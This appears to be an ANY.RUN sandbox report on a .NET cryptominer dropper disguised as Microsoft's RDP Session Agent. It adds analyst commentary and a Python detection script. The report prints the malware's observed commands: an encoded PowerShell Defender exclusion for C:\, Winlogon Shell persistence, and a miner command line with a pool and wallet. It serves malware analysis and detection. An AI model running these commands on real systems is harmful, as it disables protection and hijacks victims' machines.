| Field | Value |
|---|---|
| File name | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe |
| Full analysis | https://app.any.run/tasks/b97a9994-3802-4ebe-9074-2fbcb4e7048e |
| Verdict | Malicious activity |
| Analysis date | July 22, 2024, 15:14:56 |
| OS | Windows 10 Professional (build: 19045, 64 bit) |
| Tags | |
| Indicators | |
| MIME | application/x-dosexec |
| File info | PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows |
| MD5 | 2CA5492F9DBCDAAB3FACF1768CAE5C6D |
| SHA1 | 1AA94BEA1A57F4D6933258BAF9E5D6A17B332ED7 |
| SHA256 | 1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130 |
| SSDEEP | 98304:B6GMWWCdl6k1/ZznpySti7vsEzz58ys5FNDFY7N/978+jf+T+MSvy6MCMx8WNRT7:pAoicm/B1 |
| Extension | Identified type (match score) |
|---|---|
| .exe | Generic Win/DOS Executable (50) |
| .exe | DOS Executable Generic (49.9) |
| Field | Value |
|---|---|
| AssemblyVersion | 10.0.17763.1 |
| ProductVersion | 10.0.17763.1 |
| ProductName | Microsoft® Windows® Operating System |
| OriginalFileName | Mfceum-4.exe |
| LegalTrademarks | - |
| LegalCopyright | © Microsoft Corporation. All rights reserved. |
| InternalName | Mfceum-4.exe |
| FileVersion | 10.0.17763.1 |
| FileDescription | RDP Session Agent |
| CompanyName | Microsoft Corporation |
| Comments | RDP Session Agent |
| CharacterSet | Unicode |
| LanguageCode | Neutral |
| FileSubtype | - |
| ObjectFileType | Executable application |
| FileOS | Win32 |
| FileFlags | (none) |
| FileFlagsMask | 0x003f |
| ProductVersionNumber | 10.0.17763.1 |
| FileVersionNumber | 10.0.17763.1 |
| Subsystem | Windows GUI |
| SubsystemVersion | 4 |
| ImageVersion | - |
| OSVersion | 4 |
| EntryPoint | 0x0000 |
| UninitializedDataSize | - |
| InitializedDataSize | 69120 |
| CodeSize | 6704128 |
| LinkerVersion | 48 |
| PEType | PE32+ |
| ImageFileCharacteristics | Executable, Large address aware |
| TimeStamp | 2022:09:19 14:55:19+00:00 |
| MachineType | AMD AMD64 |

The version resource claims "Microsoft Corporation" and "RDP Session Agent" with a Windows build number, but the OriginalFileName is Mfceum-4.exe and the file is a .NET assembly. Version strings are attacker-controlled metadata and are no substitute for checking an Authenticode signature.
| PID | Command line | Path | Parent process | User | Integrity level | Exit code | Description | Company | Version |
|---|---|---|---|---|---|---|---|---|---|
| 6148 | "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" | C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | explorer.exe | admin | MEDIUM | 0 | RDP Session Agent | Microsoft Corporation | 10.0.17763.1 |
| 6876 | "C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" & EXIT | C:\Windows\System32\cmd.exe | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | admin | HIGH | 0 | Windows Command Processor | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |
| 8180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | cmd.exe | admin | HIGH | 0 | Console Window Host | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |
| 6976 | "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" | C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | cmd.exe | admin | HIGH | 0 | RDP Session Agent | Microsoft Corporation | 10.0.17763.1 |
| 7032 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | admin | HIGH | 1 | Windows PowerShell | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |
| 5464 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | powershell.exe | admin | HIGH | 0 | Console Window Host | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |
| 7240 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | admin | HIGH | — (still running at end of analysis) | Microsoft .NET Assembly Registration Utility | Microsoft Corporation | 4.8.9037.0 built by: NET481REL1 |
| 1288 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | admin | MEDIUM | 0 | Windows Activation Client | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |
| 1596 | "C:\Users\admin\AppData\Roamingsigverif.exe" --algo EQUI144_5 --pers BgoldPoW --pool btg.2miners.com:4040 --user GLW2ipMiWNpeMAnrh2sW9pZ6rBo65GzY1r.Rig --log off pause | C:\Users\admin\AppData\Roamingsigverif.exe | RegAsm.exe | admin | HIGH | 3221225477 | — | — | — |
| 884 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | Roamingsigverif.exe | admin | HIGH | 0 | Console Window Host | Microsoft Corporation | 10.0.19041.1 (WinBuild.160101.0800) |

Three things in this tree deserve a second look. The `-enc` argument of PID 7032 is base64 of UTF-16LE text and decodes to `Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'`, an attempt to exclude the entire system drive from Microsoft Defender scanning; the process exited with code 1, so the command did not complete successfully in this run. PID 6876 relaunches the sample through `cmd.exe /k START`, and the second instance (PID 6976) runs at HIGH integrity where the first (PID 6148) ran at MEDIUM. PID 1596, launched from RegAsm.exe with a miner command line (Equihash 144,5 with the Bitcoin Gold personalisation string, pointed at btg.2miners.com:4040), exited with 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION); that crash is what produced the WerFault.exe artefacts in the files table, and no connection to btg.2miners.com:4040 appears in the connections table. Note also that the dropped binary sits directly in `C:\Users\admin\AppData\` under the literal name `Roamingsigverif.exe` (no separator between `Roaming` and `sigverif.exe`), which the WER report name `AppCrash_Roamingsigverif.` confirms.
| PID | Process | Key | Name | Operation | Value |
|---|---|---|---|---|---|
| 6148 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
| 6148 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
| 6148 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
| 6148 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon | Shell | write | explorer.exe,"C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe", |
| 7240 | RegAsm.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
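The following is an added triage example, not part of the ANY.RUN report or of the sample. It decodes the `powershell.exe -enc` argument and flags the behaviours the process tree and registry tables above show: a Defender path exclusion set from encoded PowerShell, a Winlogon Shell persistence entry, a miner-style command line launched by RegAsm.exe, and the `cmd.exe /k START` self-relaunch. The event tuples are copied from the report's tables; the parent PIDs of 7032 and 7240 are an assumption (the report names only the parent image, and both children run at HIGH integrity like PID 6976). The function and finding names are this example's own.

```python
"""Triage of the process tree and registry writes in this report.

Added example, not part of the ANY.RUN report or of the sample. Event tuples
are copied from the report; parent PIDs 6976 for PIDs 7032 and 7240 are an
assumption (the report lists only the parent image name). Function and
finding names are this example's own.
"""
import base64
import re

SAMPLE = r"C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe"
ENC = ("UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBm"
       "AGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==")

# (pid, parent pid, command line), taken from the report's process tree.
PROCESSES = [
    (6148, 0, f'"{SAMPLE}"'),
    (6876, 6148, rf'"C:\Windows\System32\cmd.exe" /k START "" "{SAMPLE}" & EXIT'),
    (6976, 6876, f'"{SAMPLE}"'),
    (7032, 6976, rf'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc {ENC}'),
    (7240, 6976, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"),
    (1596, 7240, r'"C:\Users\admin\AppData\Roamingsigverif.exe" --algo EQUI144_5 --pers BgoldPoW '
                 r"--pool btg.2miners.com:4040 --user GLW2ipMiWNpeMAnrh2sW9pZ6rBo65GzY1r.Rig --log off pause"),
]

# (pid, key, value name, data) for the Winlogon write in the report's registry table.
REGISTRY = [
    (6976, r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell",
     r'explorer.exe,"C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe",'),
]

# -e, -ec, -enc and -EncodedCommand are the usual spellings of the encoded-command switch.
_ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
MINER_FLAGS = ("--pool", "--algo", "--user")


def decode_encoded_command(cmdline):
    """Cleartext of a powershell.exe encoded command (base64 of UTF-16LE), or None."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1), validate=True).decode("utf-16-le").rstrip("\x00")


def image_name(cmdline):
    """Lower-cased basename of the launched image from a quoted or bare command line."""
    s = cmdline.strip()
    head = s[1:].split('"', 1)[0] if s.startswith('"') else s.split(None, 1)[0]
    return head.replace("\\??\\", "").rsplit("\\", 1)[-1].lower()


def winlogon_shell_extras(data):
    """Entries in a Winlogon Shell value beyond the default explorer.exe."""
    parts = [p.strip() for p in data.split(",")]
    return [p for p in parts if p and p.lower() != "explorer.exe"]


def triage(processes, registry):
    """Return (finding, pid, detail) triples for the behaviours this report shows."""
    by_pid = {pid: cmd for pid, _, cmd in processes}
    findings = []
    for pid, ppid, cmd in processes:
        img = image_name(cmd)
        parent_img = image_name(by_pid[ppid]) if ppid in by_pid else ""
        # Encoded PowerShell that adds a Defender exclusion (Set-MpPreference -ExclusionPath).
        if img == "powershell.exe":
            clear = decode_encoded_command(cmd)
            if clear and "set-mppreference" in clear.lower() and "-exclusionpath" in clear.lower():
                findings.append(("defender-exclusion", pid, clear))
        # cmd.exe /k START "" "<same image as its parent>": the sample relaunching itself.
        if img == "cmd.exe":
            m = re.search(r'(?i)/k\s+start\s+""\s+"([^"]+)"', cmd)
            if m and image_name(f'"{m.group(1)}"') == parent_img:
                findings.append(("self-relaunch-via-cmd", pid, m.group(1)))
        # Miner-style switches in a child of RegAsm.exe, a .NET utility often used as a hollowing host.
        if parent_img == "regasm.exe" and sum(flag in cmd for flag in MINER_FLAGS) >= 2:
            findings.append(("miner-from-regasm", pid, img))
    # Anything beyond explorer.exe in Winlogon\Shell is started at every interactive logon.
    for pid, key, name, data in registry:
        if key.lower().endswith("\\winlogon") and name.lower() == "shell":
            for extra in winlogon_shell_extras(data):
                findings.append(("winlogon-shell-persistence", pid, extra))
    return findings


if __name__ == "__main__":
    for finding, pid, detail in triage(PROCESSES, REGISTRY):
        print(f"{finding:<28} pid={pid}  {detail}")
```

Run as a script it prints one line per finding. When reusing the checks on real process-creation telemetry, key them on the parent image and the decoded command rather than on the file names seen here: the dropped paths, the Winlogon target and the pool address are specific to this sample, while an encoded `Set-MpPreference -ExclusionPath`, a non-default `Winlogon\Shell`, and miner switches under a .NET framework utility are the reusable signals.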
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Roamingsigverif._66f25098356f7f52a4e075b57a8aebce9f615f7_ca662a69_c612c3cc-6743-4773-93f8-e23c9a29769d\Report.wer | — | — | — |
| 3944 | WerFault.exe | C:\Users\admin\AppData\Local\CrashDumps\Roamingsigverif.exe.1596.dmp | — | — | — |
| 3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0AA.tmp.xml | xml | CBD13A519A80BD52B3AF9386DDB1F023 | 40C11D8BBACF236568C5B012D829ED6DB275101249628037B8EF8F5D6120247B |
| 3944 | WerFault.exe | C:\WINDOWS\AppCompat\Programs\Amcache.hve | binary | E365D7D9F6602071C717907929378F50 | 2C31745D7CA5677E973A41635246C9059813AF48EB4B0A7E9A5817B9D5EC4230 |
| 3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD069.tmp.dmp | binary | B034C4B81EA7504DCF8DD7B6BAB5B5B5 | F4B17E156E23527EAB02FC137DA53AFFDAE3DC527A8596C6DCAA740468F4AD46 |
| 3944 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERD099.tmp.WERInternalMetadata.xml | xml | D3ADB0C168CFA435ED762A0A77C32A4C | BCF64DECE86B2E1EDD067682D919C58BB63DF209D7E31CE2DA01C005E8C9CC41 |
| 7032 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 33F9F4F94DCD09FA4B2CBC0D548A56AA | 099914A0200B9C1913C98776287829369DAF37B66511C915634D09F861B8B234 |
| 7240 | RegAsm.exe | C:\Users\admin\AppData\Roamingsigverif.exe | executable | 73278D880B15CC091A24498E5E435AD8 | AC63628939F91B381816DCFE792B123DF57A589C0365D4BB10BFFE0F6645D026 |
| 7032 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1er4xbn.qel.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 6976 | 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe | executable | 2CA5492F9DBCDAAB3FACF1768CAE5C6D | 1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130 |

Nanik.exe has the same MD5 and SHA256 as the analysed sample: PID 6976 copies itself to `%APPDATA%\SystemNaknik\` and points the Winlogon `Shell` value at that copy. The miner binary written by RegAsm.exe (`Roamingsigverif.exe`, SHA256 AC636289…) is a different file and is the one that crashed, hence the WerFault.exe dump named after PID 1596.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 13.85.23.86:443 | https://slscr.update.microsoft.com/sls/ping | unknown | — | — | — |
— | — | GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 200 | 20.3.187.198:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | — |
— | — | GET | 304 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | POST | — | 20.190.160.14:443 | https://login.live.com/RST2.srf | unknown | — | — | — |
— | — | GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
— | — | GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | compressed | 23.9 Kb | — |
— | — | POST | 401 | 4.208.221.206:443 | https://licensing.mp.microsoft.com/v7.0/licenses/content | unknown | binary | 340 b | — |
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4716 | svchost.exe | 20.190.159.23:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5620 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4032 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
7856 | svchost.exe | 4.208.221.206:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
2760 | svchost.exe | 40.115.3.253:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1140 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4308 | SIHClient.exe | 52.165.165.26:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
5620 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
| Domain | IP | Reputation |
|---|---|---|
| login.live.com | | whitelisted |
| settings-win.data.microsoft.com | | whitelisted |
| google.com | | whitelisted |
| slscr.update.microsoft.com | | whitelisted |
| fe3cr.delivery.mp.microsoft.com | | whitelisted |
| licensing.mp.microsoft.com | | whitelisted |
| activation-v2.sls.microsoft.com | | whitelisted |
| client.wns.windows.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Generic Protocol Command Decode | SURICATA HTTP Request unrecognized authorization method |